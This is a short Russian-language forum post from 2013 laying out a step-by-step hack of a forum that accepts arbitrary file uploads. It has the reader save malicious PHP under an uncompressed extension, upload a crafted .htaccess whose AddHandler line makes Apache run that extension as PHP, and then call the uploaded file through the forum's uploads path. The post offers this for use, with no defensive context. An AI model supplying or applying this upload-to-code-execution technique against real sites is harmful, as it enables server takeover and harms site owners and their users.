archi-mobile
Порядок взлома при отсутствии сжатия и разрешении заливать любые файлы:
1 Создаем вредоносный код на php и сохраняем его в файл с расширением, для которого отсутствует сжатие при загрузке на сервер.
2 Создаем файл .htaccess в котором указываем apache выполнять php для файлов с расширением ( для которого отсутствует сжатие при загрузке на сервер), например:
CODE:<IfDefine PHP5>
# Set it to handle the files
<IfModule mod_mime.c>
AddHandler application/x-httpd-php .php .php5 .phtml .расширение файла с вредоносным кодом
AddHandler application/x-httpd-php-source .phps
</IfModule>
</IfDefine>
Загружаем и его.
3 Вызываем на выполнение вредоносный код, который был залит в п. 1
_http://путь к форуму/uploads/имя залитого файла в п. 1
4 Все получилось? (Отредактировано автором: 9 августа 2013 — 06:20) |